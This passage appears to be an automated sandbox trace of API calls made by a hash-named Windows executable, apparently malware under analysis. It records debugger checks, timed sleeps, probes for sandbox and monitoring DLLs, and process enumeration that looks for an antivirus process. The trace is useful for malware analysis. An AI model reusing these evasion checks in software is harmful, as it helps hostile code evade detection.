\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÊÂc\x8axú\x19", lpUsedDefaultChar=0x0) returned 256 [0109.471] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e09c8 [0109.471] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xee6570, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe")) returned 0x62 [0109.471] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xce) returned 0x6e0458 [0109.471] RtlInitializeSListHead (in: ListHead=0xee61f8 | out: ListHead=0xee61f8) [0109.471] GetLastError () returned 0x0 [0109.471] SetLastError (dwErrCode=0x0) [0109.471] GetEnvironmentStringsW () returned 0x6e48d8* [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa1a) returned 0x6e5300 [0109.472] FreeEnvironmentStringsW (penv=0x6e48d8) returned 1 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x90) returned 0x6df4c0 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3e) returned 0x6e0878 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x5c) returned 0x6deab0 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x6e) returned 0x6e0660 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x78) returned 0x6e2170 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x62) returned 0x6e06d8 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x28) returned 0x6d6c58 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x48) returned 0x6de358 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1a) returned 0x6daca0 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3a) returned 0x6de3a8 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x62) returned 0x6e5d28 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2a) returned 0x6e30b8 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2e) returned 0x6e3160 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1c) returned 0x6dac28 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xd2) returned 0x6e5d98 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x7c) returned 0x6e5e78 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x36) returned 0x6de3f0 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3a) returned 0x6e5f00 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x90) returned 0x6e5f48 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6e07f8 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x30) returned 0x6e3010 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x36) returned 0x6e48d8 [0109.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x48) returned 0x6e4918 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x52) returned 0x6e4968 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3c) returned 0x6e49c8 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xd6) returned 0x6e4a10 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2e) returned 0x6e2f30 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1e) returned 0x6daae8 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2c) returned 0x6e3278 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x54) returned 0x6e4af0 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x52) returned 0x6e4b50 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6e05e0 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x42) returned 0x6e4bb0 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2c) returned 0x6e3240 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x44) returned 0x6e4c00 [0109.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6e4c50 [0109.495] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e5300 | out: hHeap=0x6d0000) returned 1 [0109.495] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x800) returned 0x6e4c80 [0109.496] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0109.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xebdc37) returned 0x122f152 [0109.496] GetStartupInfoW (in: lpStartupInfo=0x19faa4 | out: lpStartupInfo=0x19faa4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0109.985] SetLastError (dwErrCode=0x3) [0110.138] QueryPerformanceFrequency (in: lpFrequency=0x19b1a8 | out: lpFrequency=0x19b1a8*=100000000) returned 1 [0110.202] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.252] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.271] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.272] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.273] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b0 | out: lpFrequency=0x19b1b0*=100000000) returned 1 [0110.274] QueryPerformanceFrequency (in: lpFrequency=0x19b1b8 | out: lpFrequency=0x19b1b8*=100000000) returned 1 [0110.300] GetTickCount64 () returned 0x18b39db [0110.492] GetCurrentProcess () returned 0xffffffff [0110.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xee589c*=0x0, ZeroBits=0x0, RegionSize=0xee4f7c*=0xa600000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xee589c*=0x2790000, RegionSize=0xee4f7c*=0xa600000) returned 0x0 [0145.793] GetCurrentProcess () returned 0xffffffff [0145.794] CheckRemoteDebuggerPresent (in: hProcess=0xffffffff, pbDebuggerPresent=0x19b184 | out: pbDebuggerPresent=0x19b184) returned 1 [0145.862] IsDebuggerPresent () returned 0 [0145.957] Sleep (dwMilliseconds=0x3e8) [0146.990] Sleep (dwMilliseconds=0x3e8) [0148.006] Sleep (dwMilliseconds=0x3e8) [0149.041] Sleep (dwMilliseconds=0x3e8) [0150.043] Sleep (dwMilliseconds=0x3e8) [0151.044] Sleep (dwMilliseconds=0x3e8) [0152.326] Sleep (dwMilliseconds=0x3e8) [0153.327] Sleep (dwMilliseconds=0x3e8) [0154.328] Sleep (dwMilliseconds=0x3e8) [0155.355] Sleep (dwMilliseconds=0x3e8) [0156.357] Sleep (dwMilliseconds=0x3e8) [0157.579] Sleep (dwMilliseconds=0x3e8) [0158.709] Sleep (dwMilliseconds=0x3e8) [0159.762] Sleep (dwMilliseconds=0x3e8) [0160.789] Sleep (dwMilliseconds=0x3e8) [0161.791] Sleep (dwMilliseconds=0x3e8) [0162.798] Sleep (dwMilliseconds=0x3e8) [0169.148] Sleep (dwMilliseconds=0x3e8) [0170.151] Sleep (dwMilliseconds=0x3e8) [0171.186] Sleep (dwMilliseconds=0x3e8) [0172.220] Sleep (dwMilliseconds=0x3e8) [0172.223] Sleep (dwMilliseconds=0x3e8) [0172.336] Sleep (dwMilliseconds=0x3e8) [0172.445] Sleep (dwMilliseconds=0x3e8) [0172.737] Sleep (dwMilliseconds=0x3e8) [0172.772] Sleep (dwMilliseconds=0x3e8) [0172.805] Sleep (dwMilliseconds=0x3e8) [0172.864] Sleep (dwMilliseconds=0x3e8) [0172.869] Sleep (dwMilliseconds=0x3e8) [0172.881] Sleep (dwMilliseconds=0x3e8) [0172.899] Sleep (dwMilliseconds=0x3e8) [0172.918] Sleep (dwMilliseconds=0x3e8) [0173.063] GetModuleHandleW (lpModuleName="BgAgent.dll") returned 0x0 [0173.082] GetModuleHandleW (lpModuleName="SbieDll.dll") returned 0x0 [0173.082] GetModuleHandleW (lpModuleName="api_log.dll") returned 0x0 [0173.088] GetModuleHandleW (lpModuleName="dir_watch.dll") returned 0x0 [0173.088] GetModuleHandleW (lpModuleName="pstorec.dll") returned 0x0 [0173.089] GetModuleHandleW (lpModuleName="dbghelp.dll") returned 0x0 [0173.089] GetModuleHandleW (lpModuleName="cmdvrt32.dll") returned 0x0 [0173.089] GetModuleHandleW (lpModuleName="cmdvrt64.dll") returned 0x0 [0173.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc [0173.595] Process32FirstW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.620] lstrcmpiW (lpString1="[System Process]", lpString2="BullGuardCore.exe") returned -1 [0173.659] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.692] lstrcmpiW (lpString1="System", lpString2="BullGuardCore.exe") returned 1 [0173.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.693] lstrcmpiW (lpString1="smss.exe", lpString2="BullGuardCore.exe") returned 1 [0173.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.693] lstrcmpiW (lpString1="csrss.exe", lpString2="BullGuardCore.exe") returned 1 [0173.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.694] lstrcmpiW (lpString1="wininit.exe", lpString2="BullGuardCore.exe") returned 1 [0173.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.695] lstrcmpiW (lpString1="csrss.exe", lpString2="BullGuardCore.exe") returned 1 [0173.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.696] lstrcmpiW (lpString1="winlogon.exe", lpString2="BullGuardCore.exe") returned 1 [0173.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.697] lstrcmpiW (lpString1="services.exe", lpString2="BullGuardCore.exe") returned 1 [0173.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.697] lstrcmpiW (lpString1="lsass.exe", lpString2="BullGuardCore.exe") returned 1 [0173.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.698] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.699] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.700] lstrcmpiW (lpString1="dwm.exe", lpString2="BullGuardCore.exe") returned 1 [0173.700] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.700] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, 